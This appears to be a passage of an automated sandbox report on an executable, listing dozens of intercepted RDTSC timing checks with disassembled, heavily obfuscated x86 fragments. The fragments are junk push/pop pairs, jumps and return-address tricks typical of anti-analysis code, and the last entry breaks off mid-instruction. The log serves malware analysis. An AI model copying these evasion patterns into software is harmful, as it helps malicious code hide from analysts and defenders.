Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B436 second address: F9B49C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 3CE50DD5h 0x0000000e mov ecx, eax 0x00000010 push 00000003h 0x00000012 mov edi, dword ptr [ebp+122D39F7h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FFB34E3B6C8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov edi, dword ptr [ebp+122D3927h] 0x0000003a cmc 0x0000003b push 00000003h 0x0000003d pushad 0x0000003e jne 00007FFB34E3B6C8h 0x00000044 popad 0x00000045 push DCFFAC16h 0x0000004a jnp 00007FFB34E3B6D4h 0x00000050 pushad 0x00000051 jnl 00007FFB34E3B6C6h 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B49C second address: F9B4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 1CFFAC16h 0x0000000c mov edx, dword ptr [ebp+122D3610h] 0x00000012 lea ebx, dword ptr [ebp+124602E2h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FFB34C126B8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D229Bh], eax 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jp 00007FFB34C126BCh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B4E4 second address: F9B4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B5D5 second address: F9B5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B5E3 second address: F9B5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B5ED second address: F9B690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34C126C4h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jnp 00007FFB34C126C0h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 js 00007FFB34C126C2h 0x0000001d pop eax 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FFB34C126B8h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 sub edi, dword ptr [ebp+122D3903h] 0x0000003e call 00007FFB34C126C7h 0x00000043 mov dword ptr [ebp+122D1CE6h], ecx 0x00000049 pop edx 0x0000004a lea ebx, dword ptr [ebp+124602EBh] 0x00000050 sub edx, dword ptr [ebp+122D399Bh] 0x00000056 push ecx 0x00000057 pop esi 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b jp 00007FFB34C126B6h 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B737 second address: F9B775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D5h 0x00000009 popad 0x0000000a pop edx 0x0000000b nop 0x0000000c mov edx, dword ptr [ebp+122D37FBh] 0x00000012 mov dword ptr [ebp+122D2F37h], ecx 0x00000018 push 00000000h 0x0000001a mov esi, eax 0x0000001c push E5C3C722h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFB34E3B6CBh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B775 second address: F9B7D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FFB34C126B6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 1A3C395Eh 0x00000013 mov edx, dword ptr [ebp+122D3A57h] 0x00000019 push 00000003h 0x0000001b xor ecx, dword ptr [ebp+122D3512h] 0x00000021 xor si, E5BDh 0x00000026 push 00000000h 0x00000028 or dword ptr [ebp+122D2D56h], ebx 0x0000002e push 00000003h 0x00000030 jns 00007FFB34C126C2h 0x00000036 jnp 00007FFB34C126BCh 0x0000003c mov edi, dword ptr [ebp+122D3987h] 0x00000042 call 00007FFB34C126B9h 0x00000047 jmp 00007FFB34C126BEh 0x0000004c push eax 0x0000004d je 00007FFB34C126C4h 0x00000053 push eax 0x00000054 push edx 0x00000055 push ecx 0x00000056 pop ecx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9B7D9 second address: F9B7DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC963 second address: FBC96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FFB34C126B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC96F second address: FBC973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EC1A second address: F7EC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EC1E second address: F7EC30 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFB34E3B6C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EC30 second address: F7EC72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FFB34C126B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFB34C126C8h 0x00000011 push ebx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jmp 00007FFB34C126C0h 0x00000019 pop ebx 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jl 00007FFB34C126B6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EC72 second address: F7EC76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F7EC76 second address: F7EC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBA78B second address: FBA79F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFB34E3B6CCh 0x00000008 jnc 00007FFB34E3B6C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBA95D second address: FBA983 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB34C126B6h 0x00000008 jmp 00007FFB34C126C1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FFB34C126BBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBA983 second address: FBA9A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFB34E3B6D5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBAEFC second address: FBAF0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB34C126BBh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBAF0D second address: FBAF1C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FFB34E3B6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBAF1C second address: FBAF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FFB34C126B6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBAF2A second address: FBAF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jnp 00007FFB34E3B6C6h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007FFB34E3B6D0h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBAF57 second address: FBAF62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB347 second address: FBB34E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB34E second address: FBB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB4D4 second address: FBB4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FFB34E3B6C8h 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB4E6 second address: FBB4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB632 second address: FBB649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 js 00007FFB34E3B6C6h 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB929 second address: FBB93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFB34C126BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB93C second address: FBB962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FFB34E3B6CEh 0x0000000f jnp 00007FFB34E3B6C6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 push esi 0x00000018 jmp 00007FFB34E3B6CDh 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBB962 second address: FBB978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FFB34C126B6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jg 00007FFB34C126BCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBBA9E second address: FBBAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jnp 00007FFB34E3B6F0h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBBAB3 second address: FBBACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC076 second address: FBC07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC07A second address: FBC080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC080 second address: FBC086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC1CF second address: FBC1EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FFB34C126B6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jo 00007FFB34C126B6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007FFB34C126B6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC1EE second address: FBC1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC1F2 second address: FBC237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB34C126C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FFB34C126C8h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop eax 0x00000017 jnl 00007FFB34C126BAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC237 second address: FBC241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFB34E3B6C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC241 second address: FBC245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FBC80D second address: FBC83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB34E3B6D0h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007FFB34E3B6D7h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC764E second address: FC7658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7658 second address: FC765E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7DB3 second address: FC7DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC8041 second address: FC8071 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFB34E3B6D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FFB34E3B6C8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 ja 00007FFB34E3B6C6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC8071 second address: FC807B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFB34C126B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC807B second address: FC8083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC8083 second address: FC8087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC891B second address: FC8925 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFB34E3B6CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC8925 second address: FC8947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov eax, 6E9C1ACCh 0x0000000d sbb dx, 0353h 0x00000012 popad 0x00000013 push D972F879h 0x00000018 push eax 0x00000019 push edx 0x0000001a jc 00007FFB34C126B8h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC8947 second address: FC894D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC8D6C second address: FC8D8C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFB34C126B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FFB34C126BAh 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FFB34C126B6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9027 second address: FC902D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC902D second address: FC9031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9599 second address: FC959F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC959F second address: FC95A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC95A5 second address: FC95A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9736 second address: FC973A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC97D1 second address: FC97D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC98DB second address: FC98E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9AC8 second address: FC9AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007FFB34E3B6D4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9AD9 second address: FC9ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9B64 second address: FC9B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFB34E3B6CEh 0x00000008 jmp 00007FFB34E3B6CFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jbe 00007FFB34E3B6E8h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFB34E3B6CFh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9B9F second address: FC9BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FFB34C126B8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9BD6 second address: FC9BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9BDA second address: FC9BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9BE0 second address: FC9BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9BE6 second address: FC9BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9BEA second address: FC9BFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FFB34E3B6C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9BFD second address: FC9C03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCB140 second address: FCB148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCB77C second address: FCB782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCB782 second address: FCB78D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FFB34E3B6C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCD274 second address: FCD27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCD27F second address: FCD283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCDDC1 second address: FCDDD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCDDD2 second address: FCDDD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCDDD8 second address: FCDDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCDDDC second address: FCDE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34E3B6CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFB34E3B6D4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCE808 second address: FCE8A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB34C126C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FFB34C126B8h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 jmp 00007FFB34C126C0h 0x00000017 pop ecx 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FFB34C126B8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FFB34C126B8h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D376Bh] 0x00000055 sub esi, dword ptr [ebp+122D3598h] 0x0000005b mov edi, dword ptr 